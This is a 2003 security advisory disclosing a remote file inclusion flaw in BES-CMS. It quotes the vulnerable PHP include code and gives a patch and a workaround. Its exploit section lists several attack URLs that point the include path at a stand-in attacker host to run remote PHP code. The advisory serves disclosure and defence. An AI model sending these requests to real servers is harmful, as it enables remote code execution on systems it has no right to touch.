====================================================================== Security Corporation Security Advisory [SCSA-024] BES-CMS including file vulnerability ====================================================================== PROGRAM: BES-CMS HOMEPAGE: http://bes.h6p.org VULNERABLE VERSIONS: 0.4 rc3, 0.5 rc3 RISK: MEDIUM/HIGH IMPACT: Including of file RELEASE DATE: 2003-12-20 ====================================================================== TABLE OF CONTENTS ====================================================================== 1..........................................................DESCRIPTION 2..............................................................DETAILS 3.............................................................EXPLOITS 4............................................................SOLUTIONS 5...........................................................WORKAROUND 6..................................................DISCLOSURE TIMELINE 7..............................................................CREDITS 8...........................................................DISCLAIMER 9...........................................................REFERENCES 10............................................................FEEDBACK 1. DESCRIPTION ====================================================================== "Bes-cms is a professional dynamic php website building tool. It was developped at mokka by a bored programmor. Bes-cms is capable of creating images galeries, message boards, news sections download sections contact sections and many more to be added on the plugin server." (direct quote from BES-CMS website) 2. DETAILS ====================================================================== - Including of file : A vulnerability has been discovered in BES-CMS that allows remote attackers to cause the script to include arbitrary PHP code (allows remote command execution). In : index.inc.php, Members/index.inc.php, Members/root/index.inc.php, we can see the following code : ---------------------------------------------------- include_once($PATH__Includes."actions_default.php"); ---------------------------------------------------- In the Include/functions_folder.php file : ---------------------------------------------------- include($PATH__Includes.'functions_folder_modules.php'); include($PATH__Includes.'functions_folder_plugins.php'); include($PATH__Includes.'functions_folder_files.php'); ---------------------------------------------------- In the Include/functions_hacking.php file : ---------------------------------------------------- switch($_GET['itemID']) { case 'usershow': include_once("".$PATH__Includes."functions_user.php"); Show_USer_Details($_GET['user']); break; [...] case 'send_bug': if ($UserDetails['LOGGED_IN'] == 'YES') { global $PATH__Includes; include_once("".$PATH__Includes."functions_error.php"); send_bug_report(); } break; [...] case 'content_view': global $PATH___Includes; include_once("".$PATH__Includes."functions_message_docTypes.php"); Message_Centent_View($Plugin_Path); break; case 'logger': global $PATH__Includes; include_once("".$PATH__Includes."functions_users.php"); Loggin_Message(); break; case 'search': global $PATH__Includes; include_once("".$PATH__Includes."functions_general.php"); Display_Search_Results($_POST['search_str']); break; [...] ---------------------------------------------------- In the Include/functions_message.php file : ---------------------------------------------------- include($PATH__Includes.'functions_message_docTypes.php'); include($PATH__Includes.'functions_message_edit.php'); ---------------------------------------------------- and Include/Start.php file : ------------------------------------------- include_once($inc_path."Include/vars.php"); ------------------------------------------- All these files are vulnerable...We can see that all inclusions of file begin by a indefinite variable in the code ($inc_path or $PATH_Includes) and so could be definite by an attacker. 3. EXPLOITS ====================================================================== - Including of file : (if register_globals=ON): - http://[target]/index.inc.php?PATH_Includes=http://[attacker]/ http://[target]/Members/index.inc.php?PATH_Includes=http://[attacker]/ http://[target]/Members/root/index.inc.php?PATH_Includes=http://[attacker]/ Could include the file : http://[attacker]/actions_default.php - http://[target]/Include/functions_folder.php?PATH_Includes= http://[attacker]/ Could include the files : http://[attacker]/functions_folder_modules.php http://[attacker]/functions_folder_plugins.php http://[attacker]/functions_folder_files.php - http://[target]/Include/functions_hacking.php?PATH_Includes= http://[attacker]/&itemID=usershow http://[target]/Include/functions_hacking.php?PATH_Includes= http://[attacker]/&itemID=logger Could include the file : http://[attacker]/functions_user.php - http://[target]/Include/functions_hacking.php?PATH_Includes= http://[attacker]/&itemID=send_bug&UserDetails[LOGGED_IN]=YES Could include the file : http://[attacker]/functions_error.php - http://[target]/Include/functions_hacking.php?PATH_Includes= http://[attacker]/&itemID=content_view Could include the file : http://[attacker]/functions_message_docTypes.php - http://[target]/Include/functions_hacking.php?PATH_Includes= http://[attacker]/&itemID=search Could include the file : http://[attacker]/functions_general.php - http://[target]/Include/functions_message.php?PATH_Includes= http://[attacker]/ Could include the files : http://[attacker]/functions_message_docTypes.php http://[attacker]/functions_message_edit.php - http://[target]/Include/Start.php?inc_path=http://[attacker]/ Could include the file : http://[attacker]/Include/vars.php 4. SOLUTIONS ====================================================================== You can found patch at the following link : http://www.phpsecure.info The creator was notified, published a secure version (version 0.5 rc4) 5. WORKAROUND ====================================================================== In index.inc.php, Members/index.inc.php, Members/root/index.inc.php, Include/functions_folder.php, Include/functions_hacking.php and Include/functions_message.php simply add the following line as FIRST LINE : ------------------------------------------- if (isset($_REQUEST["PATH__Includes"])){ die("Patched by phpSecure.info"); } ------------------------------------------- And at the begining of the Include/Start.php file, add the following line as FIRST LINE : ------------------------------------------------------------------------ if (isset($_REQUEST["inc_path"])){ die("Patched by phpSecure.info"); } ------------------------------------------------------------------------ 6. DISCLOSURE TIMELINE ====================================================================== 13/12/2003 Vulnerability discovered 14/12/2003 Vendor notified 15/12/2003 Vendor response 15/12/2003 Security Corporation clients notified 15/12/2003 Started e-mail discussions 20/12/2003 Last e-mail received 20/12/2003 Public disclosure 7. CREDITS ====================================================================== frog-m@n <frog-man@security-corporation.com> from http://www.phpsecure.info is credited with this discovery 8. DISLAIMER ====================================================================== The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. 9. REFERENCES ====================================================================== - Original Version: http://www.security-corporation.com/advisories-024.html - Version Française: http://www.security-corporation.com/index.php?id=advisories&a=024-FR 10. FEEDBACK ====================================================================== Please send suggestions, updates, and comments to: Security Corporation http://www.security-corporation.com advisory@security-corporation.com
